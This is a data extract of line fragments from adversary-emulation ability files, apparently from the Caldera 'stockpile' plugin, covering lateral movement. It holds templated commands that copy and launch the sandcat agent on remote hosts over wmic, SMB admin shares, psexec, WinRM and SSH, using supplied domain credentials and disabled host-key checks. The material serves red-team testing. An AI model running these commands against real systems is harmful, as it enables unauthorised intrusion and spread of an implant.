stockpile	95727b87-175c-4a69-8c7a-a5d82746a753.yml	Get-Process -ComputerName #{remote.host.fqdn} s4ndc4t;	Apache-2.0
stockpile	95727b87-175c-4a69-8c7a-a5d82746a753.yml	- source: remote.host.fqdn	Apache-2.0
stockpile	ece5dde3-d370-4c20-b213-a1f424aa8d03.yml	wmic /node:”#{remote.host.fqdn}" /user:”#{domain.user.name}" /password:”#{domain.user.password}" process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";	Apache-2.0
stockpile	ece5dde3-d370-4c20-b213-a1f424aa8d03.yml	wmic /node:”#{remote.host.fqdn}" /user:”#{domain.user.name}" /password:”#{domain.user.password}" process call create "taskkill /f /im s4ndc4t.exe"	Apache-2.0
stockpile	ece5dde3-d370-4c20-b213-a1f424aa8d03.yml	wmic /node:”#{remote.host.fqdn}" /user:”#{domain.user.name}" /password:”#{domain.user.password}" process call create "cmd.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";	Apache-2.0
stockpile	ece5dde3-d370-4c20-b213-a1f424aa8d03.yml	- source: remote.host.fqdn	Apache-2.0
stockpile	ece5dde3-d370-4c20-b213-a1f424aa8d03.yml	- source: remote.host.fqdn	Apache-2.0
stockpile	ece5dde3-d370-4c20-b213-a1f424aa8d03.yml	- source: remote.host.fqdn	Apache-2.0
stockpile	10a9d979-e342-418a-a9b0-002c483e0fa6.yml	description: Copy 54ndc47 to remote host and start it, assumes target uses SSH keys and passwordless authentication	Apache-2.0
stockpile	10a9d979-e342-418a-a9b0-002c483e0fa6.yml	name: "Remote Services: SSH"	Apache-2.0
stockpile	10a9d979-e342-418a-a9b0-002c483e0fa6.yml	scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&	Apache-2.0
stockpile	10a9d979-e342-418a-a9b0-002c483e0fa6.yml	ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'	Apache-2.0
stockpile	10a9d979-e342-418a-a9b0-002c483e0fa6.yml	ssh -o ConnectTimeout=3 #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go'	Apache-2.0
stockpile	10a9d979-e342-418a-a9b0-002c483e0fa6.yml	scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go &&	Apache-2.0
stockpile	10a9d979-e342-418a-a9b0-002c483e0fa6.yml	ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go'	Apache-2.0
stockpile	3734aa1e-c536-42b3-8912-4c91b8bdce90.yml	name: "Remote Services: Windows Remote Management"	Apache-2.0
stockpile	3734aa1e-c536-42b3-8912-4c91b8bdce90.yml	-server $server -v" } -ComputerName #{remote.host.name} -ArgumentList $startServer, $sharePath, $name, $server	Apache-2.0
stockpile	40161ad0-75bd-11e9-b475-0800200c9a66.yml	name: "Remote Services: SMB/Windows Admin Shares"	Apache-2.0
stockpile	40161ad0-75bd-11e9-b475-0800200c9a66.yml	net use \\#{remote.host.ip}\c$ /user:#{domain.user.name} #{domain.user.password};	Apache-2.0
stockpile	40161ad0-75bd-11e9-b475-0800200c9a66.yml	net use \\#{remote.host.ip}\c$ /delete;	Apache-2.0
stockpile	41bb2b7a-75af-49fd-bd15-6c827df25921.yml	name: "Remote Services: Windows Remote Management"	Apache-2.0
stockpile	41bb2b7a-75af-49fd-bd15-6c827df25921.yml	$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;	Apache-2.0
stockpile	4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml	description: Copy 54ndc47 to remote host (powershell 5 or newer only) or SCP	Apache-2.0
stockpile	4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml	$session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;	Apache-2.0
stockpile	4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml	scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go	Apache-2.0
stockpile	4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml	ssh -o ConnectTimeout=3 #{remote.ssh.cmd} 'rm -f sandcat.go'	Apache-2.0
stockpile	4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml	scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go	Apache-2.0
stockpile	4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml	ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'rm -f sandcat.go'	Apache-2.0
stockpile	620b674a-7655-436c-b645-bc3e8ea51abd.yml	cleanup: del /f sandcat.go-windows && del /f \\#{remote.host.name}\Users\Public\sandcat.go-windows.exe	Apache-2.0
stockpile	620b674a-7655-436c-b645-bc3e8ea51abd.yml	net /y use \\#{remote.host.name} & copy /y sandcat.go-windows	Apache-2.0
stockpile	620b674a-7655-436c-b645-bc3e8ea51abd.yml	\\#{remote.host.name}\Users\Public & #{psexec.path} -accepteula \\#{remote.host.name}	Apache-2.0
stockpile	65048ec1-f7ca-49d3-9410-10813e472b30.yml	description: Copy 54ndc47 to remote host (SMB)	Apache-2.0
stockpile	65048ec1-f7ca-49d3-9410-10813e472b30.yml	name: "Remote Services: SMB/Windows Admin Shares"	Apache-2.0
stockpile	65048ec1-f7ca-49d3-9410-10813e472b30.yml	$drive = "\\#{remote.host.fqdn}\C$";	Apache-2.0
stockpile	65048ec1-f7ca-49d3-9410-10813e472b30.yml	- source: remote.host.fqdn	Apache-2.0
stockpile	65048ec1-f7ca-49d3-9410-10813e472b30.yml	- source: remote.host.fqdn	Apache-2.0
stockpile	65048ec1-f7ca-49d3-9410-10813e472b30.yml	- source: remote.host.fqdn	Apache-2.0
stockpile	aa6ec4dd-db09-4925-b9b9-43adeb154686.yml	name: "Remote Services: SMB/Windows Admin Shares"	Apache-2.0
stockpile	aa6ec4dd-db09-4925-b9b9-43adeb154686.yml	net use \\#{remote.host.fqdn}\C$ /user:#{domain.user.name} #{domain.user.password}	Apache-2.0
stockpile	aa6ec4dd-db09-4925-b9b9-43adeb154686.yml	net use \\#{remote.host.fqdn}\C$ /delete	Apache-2.0
stockpile	aa6ec4dd-db09-4925-b9b9-43adeb154686.yml	- source: remote.host.fqdn	Apache-2.0
stockpile	aa6ec4dd-db09-4925-b9b9-43adeb154686.yml	- source: remote.host.fqdn	Apache-2.0

MIT License. Copyright (c) 2020-2021 Strontic.